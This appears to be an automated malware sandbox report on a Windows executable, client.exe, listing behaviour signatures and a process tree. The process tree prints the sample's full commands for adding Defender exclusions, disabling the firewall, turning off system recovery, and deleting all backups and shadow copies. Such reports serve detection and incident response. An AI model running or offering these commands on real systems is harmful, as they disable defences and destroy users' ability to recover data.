Analysis

  • max time kernel
    149s
  • max time network
    123s
  • platform
    windows11-ltsc_2024_x64
  • resource
    win11ltsc2024-20260709-en
  • resource tags

    arch:x64arch:x86image:win11ltsc2024-20260709-enlocale:en-usos:windows11-ltsc_2024-x64systemwindows
  • submitted
    28/07/2026, 12:21

General

  • Target
    client.exe
  • Size 17.8MB
  • Sample260728-pjtslshl21
  • SHA256 7e74a48ebaf713b7ecc828938a114bf32a9d3383aa51df88434b5a04a7f7915f
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Deletes system backups 3 TTPs 2 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 10 IoCs
  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Executes a command shell one-liner 1 TTPs 4 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Suspicious behavior: EnumeratesProcesses 59 IoCs
  • Suspicious use of AdjustPrivilegeToken 48 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\client.exe
    "C:\Users\Admin\AppData\Local\Temp\client.exe"
    1⤵
    • Modifies WinLogon for persistence
    • UAC bypass
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:3676
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp' -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionPath 'C:\Windows' -ErrorAction SilentlyContinue"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4144
    • C:\Windows\SYSTEM32\netsh.exe
      netsh advfirewall set allprofiles state off
      2⤵
      • Modifies Windows Firewall
      • Event Triggered Execution: Netsh Helper DLL
      PID:1004
    • C:\Windows\SYSTEM32\netsh.exe
      netsh advfirewall firewall add rule name="svchost" dir=in action=allow program="C:\Users\Admin\AppData\Local\Temp\client.exe" enable=yes
      2⤵
      • Modifies Windows Firewall
      • Event Triggered Execution: Netsh Helper DLL
      PID:3792
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Disable-ComputerRestore -Drive C:\ -ErrorAction SilentlyContinue; Start-Process cmd -ArgumentList '/c','reagentc /disable' -WindowStyle Hidden -Wait -ErrorAction SilentlyContinue; Start-Process cmd -ArgumentList '/c','wbadmin delete backup -backupTarget:C: -allVersions -quiet' -WindowStyle Hidden -Wait -ErrorAction SilentlyContinue; Start-Process cmd -ArgumentList '/c','wbadmin delete backup -backupTarget:D: -allVersions -quiet' -WindowStyle Hidden -Wait -ErrorAction SilentlyContinue; Start-Process cmd -ArgumentList '/c','vssadmin delete shadows /all /quiet' -WindowStyle Hidden -Wait -ErrorAction SilentlyContinue"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:5796
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c reagentc /disable
        3⤵
        • Executes a command shell one-liner
        • Suspicious use of WriteProcessMemory
        PID:4436
        • C:\Windows\system32\ReAgentc.exe
          reagentc /disable
          4⤵
          • Drops file in System32 directory
          • Drops file in Windows directory
          PID:2516
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c wbadmin delete backup -backupTarget:C: -allVersions -quiet
        3⤵
        • Executes a command shell one-liner
        • Suspicious use of WriteProcessMemory
        PID:2100
        • C:\Windows\system32\wbadmin.exe
          wbadmin delete backup -backupTarget:C: -allVersions -quiet
          4⤵
          • Deletes system backups
          • Drops file in Windows directory
          PID:4240
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c wbadmin delete backup -backupTarget:D: -allVersions -quiet
        3⤵
        • Executes a command shell one-liner
        • Suspicious use of WriteProcessMemory
        PID:1360
        • C:\Windows\system32\wbadmin.exe
          wbadmin delete backup -backupTarget:D: -allVersions -quiet
          4⤵
          • Deletes system backups
          • Drops file in Windows directory
          PID:4440
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c vssadmin delete shadows /all /quiet
        3⤵
        • Executes a command shell one-liner
        • Suspicious use of WriteProcessMemory
        PID:3252
        • C:\Windows\system32\vssadmin.exe
          vssadmin delete shadows /all /quiet
          4⤵
          • Interacts with shadow copies
          PID:5180
  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k netsvcs -p -s BDESVC
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:4420
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:5400

Network

        MITRE ATT&CK Enterprise v16

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        StartupProfileData-NonInteractive

        • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        • Size 1KB
        • SHA256 19fa1d05fc89a6a4b1f4191fdf82d48ee88337b45baef27305ed1f046be80871
        • MD5 SHA1 SHA512 TLSH

        __PSScriptPolicyTest_3sxomikh.wu4.ps1

        • Path C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3sxomikh.wu4.ps1
        • Size 60B
        • SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
        • MD5 SHA1 SHA512 TLSH

        memory/4144-12-0x00007FFCAAC20000-0x00007FFCAB5C4000-memory.dmp

        memory/4144-13-0x00007FFCAAC20000-0x00007FFCAB5C4000-memory.dmp

        memory/4144-6-0x00007FFCAAC20000-0x00007FFCAB5C4000-memory.dmp

        memory/4144-7-0x0000014AC0C80000-0x0000014AC0CA2000-memory.dmp

        memory/4144-8-0x00007FFCAAC20000-0x00007FFCAB5C4000-memory.dmp

        memory/4144-9-0x00007FFCAAC20000-0x00007FFCAB5C4000-memory.dmp

        memory/4144-10-0x00007FFCAAC20000-0x00007FFCAB5C4000-memory.dmp

        memory/4144-11-0x00007FFCAAC20000-0x00007FFCAB5C4000-memory.dmp

        memory/4144-0-0x00007FFCAADAF000-0x00007FFCAADB0000-memory.dmp

        memory/4144-5-0x00007FFCAAC20000-0x00007FFCAB5C4000-memory.dmp

        memory/4144-16-0x00007FFCAAC20000-0x00007FFCAB5C4000-memory.dmp

        memory/4144-18-0x00007FFCAAC20000-0x00007FFCAB5C4000-memory.dmp

        memory/4144-19-0x0000014AC0CE0000-0x0000014AC0D92000-memory.dmp

        memory/4144-17-0x0000014AC0CB0000-0x0000014AC0CCE000-memory.dmp

        memory/4144-20-0x0000014AC0C60000-0x0000014AC0C6A000-memory.dmp

        memory/4144-21-0x00007FFCAAC20000-0x00007FFCAB5C4000-memory.dmp

        memory/4144-23-0x00007FFCAAC20000-0x00007FFCAB5C4000-memory.dmp

        memory/4144-2-0x00007FFCAAC20000-0x00007FFCAB5C4000-memory.dmp

        memory/4144-1-0x00007FFCAAC20000-0x00007FFCAB5C4000-memory.dmp